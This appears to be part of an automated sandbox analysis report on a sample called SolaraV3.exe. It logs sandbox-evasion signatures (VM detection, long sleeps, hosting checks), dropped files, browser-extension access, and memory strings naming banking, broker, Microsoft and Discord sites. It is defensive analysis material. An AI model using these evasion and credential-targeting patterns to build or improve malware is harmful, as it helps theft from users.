Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B815731 rdtsc

2_2_00007FFB0B815731

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1366	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7779
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6689
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4076

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Evaded block: after key decision

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\SolaraV3.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\SolaraV3.exe

API coverage: 4.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 8015 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 1366 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456	Thread sleep count: 7779 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256	Thread sleep count: 1625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4908	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep count: 6689 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep count: 2824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 1348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056	Thread sleep count: 5447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 1321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 4059 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 201 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 5225 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 877 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep count: 4076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep count: 284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -2767011611056431s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,	1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,	2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED88E0 FindFirstFileExA,	110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF74EE8E21C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtrayZ
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: svchost.exe, 0000001A.00000002.2809507862.000001407B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811395049.000001407C854000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvcZ
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvcZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MW
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
